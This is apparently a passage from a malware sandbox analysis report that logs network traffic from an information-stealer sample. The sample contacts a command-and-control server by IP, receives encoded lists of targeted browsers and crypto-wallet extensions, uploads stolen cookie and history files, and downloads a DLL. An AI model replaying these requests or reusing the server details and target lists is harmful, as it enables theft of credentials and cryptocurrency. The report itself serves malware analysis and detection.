                                                                                                                                            Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEdvb2dsZVxcQ2hyb21lXFxBcHBsaWNhdGlvblxcfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8MHxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8QW1pZ298XEFtaWdvXFVzZXIgRGF0YXxjaHJvbWV8MHwwfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfDB8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8JUxPQ0FMQVBQREFUQSVcXFZpdmFsZGlcXEFwcGxpY2F0aW9uXFx8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8MHxFcGljUHJpdmFjeUJyb3dzZXJ8XEVwaWMgUHJpdmFjeSBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8ZXBpYy5leGV8JUxPQ0FMQVBQREFUQSVcXEVwaWMgUHJpdmFjeSBCcm93c2VyXFxBcHBsaWNhdGlvblxcfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicm93c2VyLmV4ZXxDOlxcUHJvZ3JhbSBGaWxlc1xcQ29jQ29jXFxCcm93c2VyXFxBcHBsaWNhdGlvblxcfEJyYXZlfFxCcmF2ZVNvZnR3YXJlXEJyYXZlLUJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxicmF2ZS5leGV8QzpcXFByb2dyYW0gRmlsZXNcXEJyYXZlU29mdHdhcmVcXEJyYXZlLUJyb3dz
                                                                                                                                            Oct 31, 2024 17:12:02.949876070 CET212INData Raw: 5a 58 4a 63 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 46 78 38 51 32 56 75 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47
                                                                                                                                            Data Ascii: ZXJcXEFwcGxpY2F0aW9uXFx8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcXENlbnRCcm93c2VyXFxBcHBsaWNhdGlvblxcfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVk
                                                                                                                                            Oct 31, 2024 17:12:02.949924946 CET844INData Raw: 62 33 51 67 51 6e 4a 76 64 33 4e 6c 63 6e 78 63 51 32 68 6c 5a 47 39 30 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33
                                                                                                                                            Data Ascii: b3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXE1pY3Jvc29mdFxcRWRnZVxcQXBwbGljYXRpb25cXHwzNjAgQnJvd3NlcnxcMzYwQnJvd3NlclxCcm9
                                                                                                                                            Oct 31, 2024 17:12:03.082947969 CET468OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----GDBFHDHJKKJDHJJJJKEG
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 267
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 2d 2d 0d 0a
                                                                                                                                            Data Ascii: ------GDBFHDHJKKJDHJJJJKEGContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------GDBFHDHJKKJDHJJJJKEGContent-Disposition: form-data; name="message"plugins------GDBFHDHJKKJDHJJJJKEG--
                                                                                                                                            Oct 31, 2024 17:12:03.319396973 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:03 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Content-Length: 7116
                                                                                                                                            Keep-Alive: timeout=5, max=97
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                            Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                            Oct 31, 2024 17:12:03.319463968 CET1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                            Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                            Oct 31, 2024 17:12:03.319504976 CET1236INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                            Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                                                                                            Oct 31, 2024 17:12:03.319698095 CET1236INData Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48
                                                                                                                                            Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
                                                                                                                                            Oct 31, 2024 17:12:03.319731951 CET848INData Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58
                                                                                                                                            Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
                                                                                                                                            Oct 31, 2024 17:12:03.319859982 CET1236INData Raw: 62 6e 52 70 5a 58 49 67 56 32 46 73 62 47 56 30 66 47 74 77 63 47 5a 6b 61 57 6c 77 63 47 68 6d 59 32 4e 6c 62 57 4e 70 5a 32 35 6f 61 57 5a 77 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47
                                                                                                                                            Data Ascii: bnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1
                                                                                                                                            Oct 31, 2024 17:12:03.319894075 CET316INData Raw: 62 57 6c 6f 62 6d 52 74 62 57 4e 6b 59 57 35 68 59 32 39 73 62 6d 68 38 4d 58 77 77 66 44 42 38 51 6d 6c 30 5a 32 56 30 49 46 64 68 62 47 78 6c 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d
                                                                                                                                            Data Ascii: bWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN
                                                                                                                                            Oct 31, 2024 17:12:03.322055101 CET469OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----BGCFBGDHJKFIEBFIECGH
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 268
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 2d 2d 0d 0a
                                                                                                                                            Data Ascii: ------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="message"fplugins------BGCFBGDHJKFIEBFIECGH--
                                                                                                                                            Oct 31, 2024 17:12:03.558397055 CET335INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:03 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Content-Length: 108
                                                                                                                                            Keep-Alive: timeout=5, max=96
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                            Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                            Oct 31, 2024 17:12:03.581949949 CET202OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGI
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 6651
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Oct 31, 2024 17:12:03.582016945 CET6651OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64
                                                                                                                                            Data Ascii: ------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                            Oct 31, 2024 17:12:03.974469900 CET202INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:03 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Content-Length: 0
                                                                                                                                            Keep-Alive: timeout=5, max=95
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Oct 31, 2024 17:12:04.262918949 CET93OUTGET /4bdcdc3545a160aa/sqlite3.dll HTTP/1.1
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Oct 31, 2024 17:12:04.497580051 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:04 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                                                                                                                            ETag: "10e436-5e7eeebed8d80"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 1106998
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                            Oct 31, 2024 17:12:04.497625113 CET1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                            Data Ascii: #N@B/81s:<R@B/92P @B


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.449754185.235.128.16807308C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 31, 2024 17:12:16.138690948 CET628OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBF
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 427
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                                                                                            Data Ascii: ------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------EGCGHCBKFCFBFHIDHDBF--
                                                                                                                                            Oct 31, 2024 17:12:17.111496925 CET203INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:16 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Content-Length: 0
                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Oct 31, 2024 17:12:17.317343950 CET202OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----HJJKJJDHCGCAECAAECFH
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 1451
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Oct 31, 2024 17:12:17.319463968 CET1451OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 4a 4a 44 48 43 47 43 41 45 43 41 41 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64
                                                                                                                                            Data Ascii: ------HJJKJJDHCGCAECAAECFHContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------HJJKJJDHCGCAECAAECFHContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
                                                                                                                                            Oct 31, 2024 17:12:17.642447948 CET202INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:17 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Content-Length: 0
                                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Oct 31, 2024 17:12:17.666162968 CET564OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----CBGCGDBKEGHIEBGDBFHD
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 363
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 47 44 42 4b 45 47 48 49 45 42 47 44 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 47 44 42 4b 45 47 48 49 45 42 47 44 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 47 44 42 4b 45 47 48 49 45 42 47 44 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 